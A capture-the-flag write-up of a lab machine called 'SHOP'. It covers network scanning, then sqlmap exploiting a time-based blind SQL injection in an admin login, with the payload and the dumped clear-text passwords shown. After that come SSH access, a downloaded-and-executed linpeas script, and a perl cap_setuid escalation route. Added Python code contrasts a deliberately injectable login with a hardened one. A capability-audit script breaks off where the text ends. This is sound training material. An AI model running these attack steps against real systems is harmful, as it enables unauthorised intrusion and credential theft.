SHOP MACHINE
The first step was network reconnaissance to identify the target machine. arp-scan was used to find active hosts on the local network, which confirmed a host at 192.168.88.5.
┌──(luis㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet
[sudo] contraseña para luis:
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1 d8:44:89:50:2d:a3 (Unknown)
192.168.88.4 00:e0:4c:97:01:a7 (Unknown)
192.168.88.5 08:00:27:8c:fc:84 (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.900 seconds (88.28 hosts/sec). 3 responded
Next, ping was run to confirm that there is connectivity between both machines, as shown below.
┌──(luis㉿kali)-[~]
└─$ ping -c3 192.168.88.5
PING 192.168.88.5 (192.168.88.5) 56(84) bytes of data.
64 bytes from 192.168.88.5: icmp_seq=1 ttl=64 time=0.763 ms
64 bytes from 192.168.88.5: icmp_seq=2 ttl=64 time=0.436 ms
64 bytes from 192.168.88.5: icmp_seq=3 ttl=64 time=0.540 ms
--- 192.168.88.5 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2039ms
rtt min/avg/max/mdev = 0.436/0.579/0.763/0.136 ms
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed that ports 22 (SSH) and 80 (HTTP) were open.
In addition, Nmap results showed that port 80 was running an Apache httpd 2.4.38 web server and port 22 was running an OpenSSH 7.9p1 server.
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn -p- --min-rate 5000 192.168.88.5 -vvv -sV -vvv
[sudo] contraseña para luis:
Lo siento, pruebe otra vez.
[sudo] contraseña para luis:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-12 19:44 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 19:44
Scanning 192.168.88.5 [1 port]
Completed ARP Ping Scan at 19:44, 0.13s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:44
Scanning 192.168.88.5 [65535 ports]
Discovered open port 22/tcp on 192.168.88.5
Discovered open port 80/tcp on 192.168.88.5
SYN Stealth Scan Timing: About 60.28% done; ETC: 19:46 (0:00:45 remaining)
Increasing send delay for 192.168.88.5 from 0 to 5 due to 5774 out of 19245 dropped probes since last increase.
SYN Stealth Scan Timing: About 79.87% done; ETC: 19:47 (0:00:33 remaining)
Increasing send delay for 192.168.88.5 from 5 to 10 due to 201 out of 668 dropped probes since last increase.
Increasing send delay for 192.168.88.5 from 10 to 20 due to 2591 out of 8636 dropped probes since last increase.
Increasing send delay for 192.168.88.5 from 20 to 40 due to max_successful_tryno increase to 4
Increasing send delay for 192.168.88.5 from 40 to 80 due to max_successful_tryno increase to 5
Increasing send delay for 192.168.88.5 from 80 to 160 due to max_successful_tryno increase to 6
Increasing send delay for 192.168.88.5 from 160 to 320 due to max_successful_tryno increase to 7
Increasing send delay for 192.168.88.5 from 320 to 640 due to max_successful_tryno increase to 8
Increasing send delay for 192.168.88.5 from 640 to 1000 due to max_successful_tryno increase to 9
Completed SYN Stealth Scan at 19:51, 441.14s elapsed (65535 total ports)
Initiating Service scan at 19:52
Scanning 2 services on 192.168.88.5
Completed Service scan at 19:52, 7.11s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.88.5.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:52
Completed NSE at 19:52, 0.72s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:52
Completed NSE at 19:52, 0.25s elapsed
Nmap scan report for 192.168.88.5
Host is up, received arp-response (0.00061s latency).
Scanned at 2025-09-12 19:44:38 CEST for 450s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:8C:FC:84 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 454.29 seconds
Raw packets sent: 309472 (13.617MB) | Rcvd: 65578 (2.628MB)
With the web service identified on port 80, the next step was to search for hidden directories and files. Gobuster was used with a common wordlist for this purpose, as shown below, and it discovered an interesting directory named /administrator. This finding suggested the existence of a login panel that could be a target for a vulnerability.
┌──(luis㉿kali)-[~]
└─$ sudo gobuster dir -url "http://192.168.88.5/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,txt,bak,doc,jpg
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.88.5/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: doc,jpg,php,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/1.jpg (Status: 200) [Size: 211418]
/2.jpg (Status: 200) [Size: 200971]
/3.jpg (Status: 200) [Size: 214425]
/css (Status: 301) [Size: 310] [--> http://192.168.88.5/css/]
/js (Status: 301) [Size: 309] [--> http://192.168.88.5/js/]
/fonts (Status: 301) [Size: 312] [--> http://192.168.88.5/fonts/]
/administrator (Status: 301) [Size: 320] [--> http://192.168.88.5/administrator/]
Browsing to this URL showed the website (pictured in the original post), and several of the other discovered paths returned forbidden pages (also pictured there).
Upon accessing the /administrator directory, a login form was found. To test whether it was vulnerable to SQL injection, sqlmap, an automated tool that finds and exploits SQL injection vulnerabilities, was used. The first command searched for available databases. After a series of tests, sqlmap identified a time-based blind injection in the username field and found a database named Webapp.
└─# sqlmap --url "http://192.168.88.5/administrator/" --dbs --forms --batch
___
__H__
___ ___[,]_____ ___ ___ {1.9.8#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:05:39 /2025-09-12/
[20:05:39] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=r0pc18hf9a0...v1gur7abgg'). Do you want to use those [Y/n] Y
[20:05:40] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[20:05:41] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0805pm.csv' as the CSV results file in multiple targets mode
[20:05:41] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:05:41] [INFO] testing if the target URL content is stable
[20:05:41] [INFO] target URL content is stable
[20:05:41] [INFO] testing if POST parameter 'username' is dynamic
[20:05:41] [WARNING] POST parameter 'username' does not appear to be dynamic
[20:05:41] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[20:05:41] [INFO] testing for SQL injection on POST parameter 'username'
[20:05:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:05:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:05:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:05:42] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:05:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:05:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:05:42] [INFO] testing 'Generic inline queries'
[20:05:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:05:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:05:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:05:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:05:53] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:05:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:05:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to 'http://192.168.88.5/administrator/profile.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[20:05:55] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:06:02] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:06:03] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[20:06:19] [INFO] the back-end DBMS is MySQL
[20:06:19] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:06:24] [INFO] fetching database names
[20:06:24] [INFO] fetching number of databases
[20:06:24] [INFO] retrieved: 4
[20:06:30] [INFO] retrieved:
[20:06:35] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[20:08:45] [INFO] retrieved: Webapp
[20:09:42] [INFO] retrieved: mysql
[20:10:24] [INFO] retrieved: performance_schema
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp
[20:12:38] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0805pm.csv'
[*] ending @ 20:12:38 /2025-09-12/
The process continued by enumerating the tables within the Webapp database, as shown below.
┌──(root㉿kali)-[/home/luis]
└─# sqlmap --url "http://192.168.88.5/administrator/" -D Webapp --tables --forms --batch
___
__H__
___ ___[']_____ ___ ___ {1.9.8#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:44:28 /2025-09-12/
[20:44:29] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=cqrlc4sb6d3...rth96gj6cd'). Do you want to use those [Y/n] Y
[20:44:31] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[20:44:35] [INFO] resuming back-end DBMS 'mysql'
[20:44:35] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0844pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[20:44:36] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:36] [INFO] fetching tables for database: 'Webapp'
[20:44:36] [INFO] fetching number of tables for database 'Webapp'
[20:44:37] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[20:44:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[20:44:50] [INFO] retrieved:
[20:45:01] [INFO] adjusting time delay to 2 seconds due to good response times
Users
Database: Webapp
[1 table]
+-------+
| Users |
+-------+
[20:45:33] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0844pm.csv'
[*] ending @ 20:45:33 /2025-09-12/
Sqlmap revealed a table called Users. Next, the columns of the Users table were extracted, as shown below; the columns found were id, username, and password. Finally, the full data from the table was dumped to obtain the users' credentials.
┌──(root㉿kali)-[/home/luis]
└─# sqlmap --url "http://192.168.88.5/administrator/" -D Webapp -T Users --columns --forms --batch
___
__H__
___ ___[)]_____ ___ ___ {1.9.8#stable}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:47:55 /2025-09-12/
[20:47:56] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=on7p5aap9n3...ht81qcqibv'). Do you want to use those [Y/n] Y
[20:47:59] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[20:48:04] [INFO] resuming back-end DBMS 'mysql'
[20:48:04] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0848pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[20:48:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:05] [INFO] fetching columns for table 'Users' in database 'Webapp'
[20:48:06] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[20:48:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[20:48:36] [INFO] adjusting time delay to 3 seconds due to good response times
3
[20:48:38] [INFO] retrieved: id
[20:48:59] [INFO] retrieved: int(6)
[20:50:24] [INFO] retrieved: username
[20:51:41] [INFO] retrieved: varchar(32)
[20:53:32] [INFO] retrieved: password
[20:55:00] [INFO] retrieved: varchar(32)
Database: Webapp
Table: Users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(6) |
| password | varchar(32) |
| username | varchar(32) |
+----------+-------------+
[20:56:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0848pm.csv'
[*] ending @ 20:56:53 /2025-09-12/
The data dump showed the following credentials:
- peter: peter123!
- mike: mikeblabla
- bart: b4rtp0w4
- liam: liam@nd3rs0n
└─# sqlmap --url "http://192.168.88.5/administrator/" -D Webapp -T Users --dump --forms --batch
___
__H__
___ ___[(]_____ ___ ___ {1.9.8#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:13:41 /2025-09-12/
[21:13:42] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=hj6s84tlunk...beb0jr8094'). Do you want to use those [Y/n] Y
[21:13:44] [INFO] searching for forms
[1/1] Form:
POST http://192.168.88.5/administrator/login.php
POST data: username=&password=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=] (Warning: blank fields detected): username=&password=&submit=
do you want to fill blank fields with random values? [Y/n] Y
[21:13:48] [INFO] resuming back-end DBMS 'mysql'
[21:13:48] [INFO] using '/root/.local/share/sqlmap/output/results-09122025_0913pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=pBXu' AND (SELECT 7720 FROM (SELECT(SLEEP(5)))aDPR) AND 'ArvY'='ArvY&password=ukBS&submit=LSxO
---
do you want to exploit this SQL injection? [Y/n] Y
[21:13:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:13:49] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:49] [INFO] resumed: 3
[21:13:49] [INFO] resumed: id
[21:13:49] [INFO] resumed: username
[21:13:49] [INFO] resumed: password
[21:13:49] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:13:49] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:13:49] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[21:13:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
4
[21:14:00] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[21:14:14] [INFO] retrieved:
[21:14:20] [INFO] adjusting time delay to 1 second due to good response times
peter123!
[21:14:53] [INFO] retrieved: peter
[21:15:13] [INFO] retrieved: 2
[21:15:17] [INFO] retrieved: mikeblabla
[21:15:49] [INFO] retrieved: mike
[21:16:04] [INFO] retrieved: 3
[21:16:08] [INFO] retrieved: b4rtp0w4
[21:16:48] [INFO] retrieved: bart
[21:17:02] [INFO] retrieved: 4
[21:17:08] [INFO] retrieved: liam@nd3rs0n
[21:18:01] [INFO] retrieved: liam
Database: Webapp
Table: Users
[4 entries]
+----+--------------+----------+
| id | password | username |
+----+--------------+----------+
| 1 | peter123! | peter |
| 2 | mikeblabla | mike |
| 3 | b4rtp0w4 | bart |
| 4 | liam@nd3rs0n | liam |
+----+--------------+----------+
[21:18:15] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.88.5/dump/Webapp/Users.csv'
[21:18:15] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09122025_0913pm.csv'
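Why the login form above was injectable, and what the fix looks like, as an added example that is not code from the SHOP machine or its login.php. An in-memory SQLite table stands in for the MariaDB Webapp.Users table seen in the dump; SQLite has no SLEEP(), so the probe uses the boolean-based variant sqlmap also tested ('AND boolean-based blind' in its output), with the same payload shape as its SLEEP payload and the server's answer, rather than its delay, as the oracle. The vulnerable handler reproduces the two defects the page's evidence points to (a string-built query and clear-text varchar(32) passwords); the hardened one uses a parameterised query, a salted PBKDF2 hash and one generic failure answer. User names, passwords, function names and the PBKDF2 round count are this example's own.

```python
"""Blind-injectable login beside a hardened one (added example, SQLite stand-in)."""
import hashlib
import hmac
import os
import sqlite3

# Constructed sample rows; names and passwords are placeholders, not the dump's.
SAMPLE_USERS = [("alice", "alice-pass"), ("bob", "bob-pass")]
PBKDF2_ROUNDS = 100_000  # chosen for this example


def _kdf(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def build_db(hashed):
    """hashed=False mirrors the dump (clear-text passwords);
    hashed=True stores a per-user salt and a PBKDF2-SHA256 hash instead."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password, salt BLOB)"
    )
    for uid, (user, pw) in enumerate(SAMPLE_USERS, start=1):
        salt = os.urandom(16) if hashed else b""
        stored = _kdf(pw, salt) if hashed else pw
        conn.execute("INSERT INTO Users VALUES (?, ?, ?, ?)", (uid, user, stored, salt))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Defect 1: the username is spliced into the SQL text, so the quote in the
    payload closes the literal and the rest of the payload runs as SQL.
    Defect 2: the two failure cases answer differently, so a caller learns
    whether the injected condition was true (the oracle a blind probe needs)."""
    sql = "SELECT password FROM Users WHERE username = '" + username + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return "no_such_user"
    return "ok" if row[0] == password else "bad_password"


def hardened_login(conn, username, password):
    """Parameterised query: the payload is compared as a literal username.
    Constant-time hash comparison and a single generic failure answer."""
    row = conn.execute(
        "SELECT password, salt FROM Users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        _kdf(password, b"\x00" * 16)  # spend the same time as a real check
        return "invalid_credentials"
    if hmac.compare_digest(row[0], _kdf(password, row[1])):
        return "ok"
    return "invalid_credentials"


# Same shape as sqlmap's payload above, with 1=1 / 1=2 in place of SLEEP(5).
PROBE_TRUE = "alice' AND 1=1 AND 'x'='x"
PROBE_FALSE = "alice' AND 1=2 AND 'x'='x"


def oracle_leaks(login, conn):
    """True when a true and a false injected condition get different answers."""
    return login(conn, PROBE_TRUE, "guess") != login(conn, PROBE_FALSE, "guess")


if __name__ == "__main__":
    print("vulnerable leaks:", oracle_leaks(vulnerable_login, build_db(False)))  # True
    print("hardened leaks:  ", oracle_leaks(hardened_login, build_db(True)))     # False
```

Running it shows that the vulnerable handler answers differently for a true and a false injected condition while the hardened one does not: with a parameterised query the whole payload is looked up as a literal username, so neither a boolean nor a SLEEP() probe has any SQL to attach to. Hashing also means a dump like the one above yields salts and hashes rather than passwords that can be reused over SSH.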
With the obtained credentials, an attempt was made to access the machine via the SSH service discovered earlier on port 22. All the users had to be tried; only bart's credentials were successful:
- bart: b4rtp0w4
Access was gained as the user bart. The first action was to look for the user.txt file to get the first "flag."
┌──(luis㉿kali)-[~]
└─$ ssh bart@192.168.88.5
The authenticity of host '192.168.88.5 (192.168.88.5)' can't be established.
ED25519 key fingerprint is SHA256:6B7Eq7tDKYRhgb51UUxBClZm4njvA+jpdW3lVy6PPK4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.5' (ED25519) to the list of known hosts.
bart@192.168.88.5's password:
bart@shop:~$ whoami
bart
bart@shop:~$ sudo -l
-bash: sudo: orden no encontrada
bart@shop:~$ script /dev/null -c bash
Script iniciado; el fichero es /dev/null
bart@shop:~$ ls
user.txt
Gotcha! We have discovered the user flag.
bart@shop:~$ cat user.txt
598a05f84190e327bc4796335d948144
bart@shop:~$ find /-perm -4000 2>/dev/null
bart@shop:~$ getcap 2>/dev/null
bart@shop:~$ getcap -r 2>/dev/null
bart@shop:~$ /sbin/getcap -r 2>/dev/null
bart@shop:~$ /sbin/getcap -r / 2>/dev/null
/usr/bin/perl5.28.1 = cap_setuid+ep
/usr/bin/perl = cap_setuid+ep
The ultimate goal was to gain root access. The attempt to use sudo -l failed because sudo was not found on the machine. The next step was to enumerate possible privilege escalation vectors on the system. The getcap tool was used to search for files with special permissions (capabilities); the result, shown in the session above, was that the Perl executables had the cap_setuid+ep capability. Next, the linPEAS toolkit (linked in the command below) was downloaded and executed, and it reported the same capabilities.
bart@shop:/tmp$ wget https://github.com/peass-ng/PEASS-ng/releases/download/20250904-27f4363e/linpeas.sh
--2025-09-12 22:36:59-- https://github.com/peass-ng/PEASS-ng/releases/download/20250904-27f4363e/linpeas.sh
Resolviendo github.com (github.com)... 140.82.121.3
Conectando con github.com (github.com)[140.82.121.3]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8d829b89-f4bc-402c-ab2d-b18bb9f64212?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-12T21%3A13%3A03Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-12T20%3A12%3A38Z&ske=2025-09-12T21%3A13%3A03Z&sks=b&skv=2018-11-09&sig=3VbypFXZoFOMHP%2B36xd56VW5xXEF0llqlshw%2FKk%2FE%2FE%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzcwOTcyMCwibmJmIjoxNzU3NzA5NDIwLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.Cii9HerAJKTpIVvMy1kNpmzn1QPyt-fTVtKwrVOZ7O0&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [siguiendo]
--2025-09-12 22:37:00-- https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8d829b89-f4bc-402c-ab2d-b18bb9f64212?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-09-12T21%3A13%3A03Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-09-12T20%3A12%3A38Z&ske=2025-09-12T21%3A13%3A03Z&sks=b&skv=2018-11-09&sig=3VbypFXZoFOMHP%2B36xd56VW5xXEF0llqlshw%2FKk%2FE%2FE%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1NzcwOTcyMCwibmJmIjoxNzU3NzA5NDIwLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.Cii9HerAJKTpIVvMy1kNpmzn1QPyt-fTVtKwrVOZ7O0&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolviendo release-assets.githubusercontent.com (release-assets.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Conectando con release-assets.githubusercontent.com (release-assets.githubusercontent.com)[185.199.111.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 961834 (939K) [application/octet-stream]
Grabando a: “linpeas.sh”
linpeas.sh 100%[========================================================================>] 939,29K 3,59MB/s en 0,3s
2025-09-12 22:37:01 (3,59 MB/s) - “linpeas.sh” guardado [961834/961834]
bart@shop:/tmp$ ls
linpeas.sh
systemd-private-d0cce5d2e13e40e382de5071127af918-apache2.service-GqxqMF
systemd-private-d0cce5d2e13e40e382de5071127af918-systemd-timesyncd.service-wraE3B
bart@shop:/tmp$ chmod +x linpeas.sh
bart@shop:/tmp$ ./linpeas.sh
Files with capabilities (limited to 50):
/usr/bin/perl5.28.1 = cap_setuid+ep
/usr/bin/perl = cap_setuid+ep
The cap_setuid capability allows a program to change its user ID (UID), including to 0, which effectively grants it root privileges. Once this vulnerability was identified, a known Perl payload was used to exploit the capability.
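As a defender-side check for the finding above, here is an added audit script that is not part of the original post or of PEASS-ng. It parses the lines that getcap -r prints, flags the capabilities that amount to root (cap_setuid among them) and marks interpreters in particular, since a capability on perl applies to every script it runs. Two of the sample lines are the real ones from the session above; the other sample lines, the HIGH_RISK table, the interpreter list and the helper names are this example's own assumptions.

```python
"""Audit getcap output for file capabilities that hand out root (added example)."""
import re
import subprocess

# Capabilities that let an unprivileged user become root or read/alter any file.
HIGH_RISK = {
    "cap_setuid": "can switch to uid 0 (what the Perl one-liner on this machine relies on)",
    "cap_setgid": "can switch to any group, e.g. shadow or disk",
    "cap_dac_override": "bypasses file permission checks",
    "cap_dac_read_search": "reads any file, e.g. /etc/shadow",
    "cap_chown": "can take ownership of any file",
    "cap_fowner": "bypasses owner checks on files",
    "cap_sys_admin": "broad administrative operations, mounts included",
    "cap_sys_ptrace": "can attach to and control other users' processes",
    "cap_sys_module": "can load kernel modules",
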